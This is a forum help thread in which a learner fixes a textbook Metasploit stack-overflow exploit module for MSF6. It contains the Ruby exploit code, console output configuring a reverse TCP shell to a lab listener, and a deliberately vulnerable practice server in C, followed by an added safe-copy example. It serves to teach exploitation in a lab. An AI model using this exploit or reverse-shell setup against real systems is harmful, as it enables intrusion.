Unsolved [Help] The MSF exploit example from "0day Software Vulnerability Analysis Techniques" (2nd edition) reports an error (bounty: 300 雪币)
Posted on: 2024-10-28 21:01 1589


The MSF exploit example from "0day Software Vulnerability Analysis Techniques" (2nd edition) reports an error

The example as printed in the book cannot be loaded into MSF. It is as follows:

#/*****************************************************************************
#      To be the apostrophe which changed "Impossible" into "I'm possible"!
#      
#POC code of chapter 4 in book "Vulnerability Exploit and Analysis Technique"
#
#file name  : test.rb
#author     : failwest 
#date       : 2007.4.4
#description    : used as a demo to show how to implemented exploit module of MSF
#Noticed    : create a sub directory named "failwest" in the exploit directory
#         of MSF 3.0. For example, the default directory of exploit is
#         "C:\Program Files\Metasploit\Framework3\framework\modules\exploits"
#         this module should be put into
#         "C:\Program Files\Metasploit\Framework3\framework\modules\exploits\failwest\"
#version    : 1.0
#E-mail     : failwest@gmail.com
#      
#   Only for educational purposes    enjoy the fun from exploiting :)
#******************************************************************************/
require 'msf/core'
module Msf
class Exploits::Failwest::Test < Msf::Exploit::Remote
include Exploit::Remote::Tcp
     
    def initialize(info = {})
        super(update_info(info,
        'Name'      => 'failwest_test',
        'Platform'  => 'win',
        'Targets'   => [
                    ['Windows 2000',  {'Ret' => 0x77F8948B } ],
                    ['Windows XP SP2',{'Ret' => 0x7C914393 } ],
                    ['Windows XP SP1',{'Ret' => 0x77E7AE59 } ]
                   ],
        'Payload'       => {
                    'Space'    => 200,
                    'BadChars' => "\x00",
                    }
        ))
    end #end of initialize
 
    def exploit
        connect
        attack_buf = 'a'*200 + [target['Ret']].pack('V') + payload.encoded
        sock.put(attack_buf)   
        handler
        disconnect
    end  #end of exploit def
end #end of class def
end #end of module def

I looked at the existing examples in MSF and modified it a bit:

#/*****************************************************************************
#      To be the apostrophe which changed "Impossible" into "I'm possible"!
#      
#POC code of chapter 4 in book "Vulnerability Exploit and Analysis Technique"
#
#file name  : test.rb
#author     : failwest 
#date       : 2007.4.4
#description    : used as a demo to show how to implemented exploit module of MSF
#Noticed    : create a sub directory named "failwest" in the exploit directory
#         of MSF 3.0. For example, the default directory of exploit is
#         "C:\Program Files\Metasploit\Framework3\framework\modules\exploits"
#         this module should be put into
#         "C:\Program Files\Metasploit\Framework3\framework\modules\exploits\failwest\"
#version    : 1.0
#E-mail     : failwest@gmail.com
#      
#   Only for educational purposes    enjoy the fun from exploiting :)
#******************************************************************************/
 
class MetasploitModule < Msf::Exploit::Remote
    include Msf::Exploit::Remote::Tcp
    Rank = GreatRanking
    def initialize(info = {})
        super(update_info(info,
        'Name'      => 'yuker_test',
        'Platform'  => 'win',
        # 'Targets' => [
        #           ['Windows 2000',  {'Ret' => 0x77F8948B } ],
        #           ['Windows XP SP2',{'Ret' => 0x7C914393 } ],
        #           ['Windows XP SP1',{'Ret' => 0x77E7AE59 } ]
        #          ],
        'Targets'        =>
        [
        #   [ 'Automatic1111', { } ],
        #   [
        #     'Windows 2000', # Tested OK - 11/25/2005 hdm
        #     {
        #       'Platform' => 'win',
        #       'Ret'     => 0x77F8948B,
        #     },
        #   ],
        #   [
        #     'Windows XP SP2', # Tested OK - 11/25/2005 hdm
        #     {
        #       'Platform' => 'win',
        #       'Ret'     => 0x7C914393,
        #     },
        #   ],
          [
            'Windows XP SP1', # Tested OK - 11/25/2005 hdm
            {
              'Platform' => 'win',
              'Ret'     => 0x77E7AE59,
            },
          ],
        ],
        'Payload'       => {
                    'Space'    => 200,
                    'BadChars' => "\x00",
                    }
        ))
    end #end of initialize
 
    def exploit
        connect
        attack_buf = 'a'*200 + [target['Ret']].pack('V') + payload.encoded
        sock.put(attack_buf)   
        handler
        disconnect
    end  #end of exploit def
end #end of class def

Now it does load, but when I use it in MSF, with all options configured, it reports an error saying the encoder cannot encode:

msf6 exploit(windows/wins/yuker_test) > show options
 
Module options (exploit/windows/wins/yuker_test):
 
   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.92.137   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics
                                      /using-metasploit.html
   RPORT   7777             yes       The target port (TCP)
 
 
Payload options (generic/shell_reverse_tcp):
 
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.92.131   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
 
 
Exploit target:
 
   Id  Name
   --  ----
   0   Windows XP SP1
 
 
 
View the full module info with the info, or info -d command.
 
msf6 exploit(windows/wins/yuker_test) > exploit
 
[-] 192.168.92.137:7777 - Exploit failed: generic/shell_reverse_tcp: All encoders failed to encode.
[*] Exploit completed, but no session was created.

I looked at the issue on GitHub; there are related replies, but I did not understand them. Honestly, I only learned Ruby by following the book. I would be grateful if some kind soul could point me in the right direction.



Latest replies (1)

Just solved it.


The target program's code is as follows:

/*****************************************************************************
      To be the apostrophe which changed "Impossible" into "I'm possible"!
		
POC code of chapter 4 in book "Vulnerability Exploit and Analysis Technique"
 
file name	: target_server.cpp
author		: failwest  
date		: 2007.4.4
description	: TCP server which got a stack overflow bug for exploit practice 
Noticed		: Compiling with VC 6.0 and building a release version is recommended
version		: 1.0
E-mail		: failwest@gmail.com
		
	Only for educational purposes    enjoy the fun from exploiting :)
******************************************************************************/
#include<iostream.h>
#include<winsock2.h>
#pragma comment(lib, "ws2_32.lib")
void msg_display(char * buf)
{
	char msg[200];
	//strcpy(msg,buf);// overflow here, copy 0x200 to 200   the program originally used a string copy
	memcpy(msg,buf,0x800);  // changed to a raw memory copy, which avoids the BadChars '\x00'
	cout<<"********************"<<endl;
	cout<<"received:"<<endl;
	cout<<msg<<endl;
}
void main()
{
	int sock,msgsock,lenth,receive_len;
	struct sockaddr_in sock_server,sock_client;
	char buf[0x800]; //noticed it is 0x200
	
	WSADATA wsa;
	WSAStartup(MAKEWORD(1,1),&wsa);
	if((sock=socket(AF_INET,SOCK_STREAM,0))<0)
	{
		cout<<sock<<"socket creating error!"<<endl;
		exit(1);
	}
	sock_server.sin_family=AF_INET;
	sock_server.sin_port=htons(7777);
	sock_server.sin_addr.s_addr=htonl(INADDR_ANY);
	if(bind(sock,(struct sockaddr*)&sock_server,sizeof(sock_server)))
	{
		cout<<"binding stream socket error!"<<endl;
	}
	cout<<"**************************************"<<endl;
	cout<<"     exploit target server 1.0	   "<<endl;
	cout<<"**************************************"<<endl;
	listen(sock,4);
	lenth=sizeof(struct sockaddr);
	do{
		msgsock=accept(sock,(struct sockaddr*)&sock_client,(int*)&lenth);
		if(msgsock==-1)
		{
			cout<<"accept error!"<<endl;
			break;
		}
		else 
			do
			{
				memset(buf,0,sizeof(buf));
				if((receive_len=recv(msgsock,buf,sizeof(buf),0))<0)
				{
					cout<<"reading stream message error!"<<endl;
					receive_len=0; 
				}
				msg_display(buf);//triggers the overflow
			}while(receive_len);
			closesocket(msgsock);
	}while(1);
	WSACleanup();
}
//strcpy(msg,buf);// overflow here, copy 0x200 to 200   the program originally used a string copy
	memcpy(msg,buf,0x800);  // changed to a raw memory copy, which avoids the BadChars '\x00'

The target test program originally used strcpy to cause the stack overflow, but since MSF6 can no longer encode the windows/exec payload to avoid '\x00', I changed it to use memset to do the overflow; the MSF3 in the book and MSF6 are just too far apart in time.

2024-10-29 12:50
0
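The encoder failure in the question and the strcpy-to-memcpy change in the reply come down to one C fact: strcpy stops at the first NUL byte, memcpy copies a fixed length regardless of content. The block below is an added example, not code from the book or from either post; it models both copies against the server's 200-byte msg[] and 0x800-byte receive buffer, and shows a bounded replacement for msg_display(). make_sample() is a hypothetical helper that builds constructed input.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MSG_LEN  200     /* char msg[200] in the book's msg_display() */
#define RECV_LEN 0x800   /* char buf[0x800] in main(), also the memcpy length */
/* Bytes strcpy(msg, buf) writes: up to and including the first NUL in buf
 * (the server's memset(buf, 0, ...) supplies one unless buf is completely full). */
size_t strcpy_bytes(const char *buf, size_t avail)
{
    size_t n = 0;
    while (n < avail && buf[n] != '\0') n++;
    return n + 1;                         /* +1 for the terminating NUL */
}

/* 1 if strcpy(msg, buf) would write past the end of msg[MSG_LEN]. */
int strcpy_overflows(const char *buf, size_t avail)
{
    return strcpy_bytes(buf, avail) > MSG_LEN;
}

/* 1 if memcpy(msg, buf, copy_len) would: memcpy ignores NUL bytes, only the length matters. */
int memcpy_overflows(size_t copy_len)
{
    return copy_len > MSG_LEN;
}

/* Hardened msg_display(): copies at most MSG_LEN-1 bytes, always NUL-terminates,
 * and flags truncation so the caller can log or drop oversize input. Returns bytes kept. */
size_t msg_display_safe(const char *buf, size_t buflen)
{
    char msg[MSG_LEN];
    size_t n = buflen < MSG_LEN - 1 ? buflen : MSG_LEN - 1;
    memcpy(msg, buf, n);
    msg[n] = '\0';
    printf("received: %s%s\n", msg, buflen > n ? " [truncated]" : "");
    return n;
}

/* Constructed input (hypothetical helper, not from the thread): a zeroed RECV_LEN
 * buffer holding `fill` 'a' bytes, with a NUL planted at nul_at if nul_at < RECV_LEN. */
static char sample[RECV_LEN];
const char *make_sample(size_t fill, size_t nul_at)
{
    memset(sample, 0, sizeof sample);
    memset(sample, 'a', fill < RECV_LEN ? fill : RECV_LEN);
    if (nul_at < RECV_LEN) sample[nul_at] = '\0';
    return sample;
}
```

With strcpy, a 300-byte message that carries a NUL at offset 100 never reaches the 200-byte boundary, which is exactly the constraint the encoder is asked to work around; with memcpy(msg, buf, 0x800) every message overflows, and only the bounded copy holds in both cases.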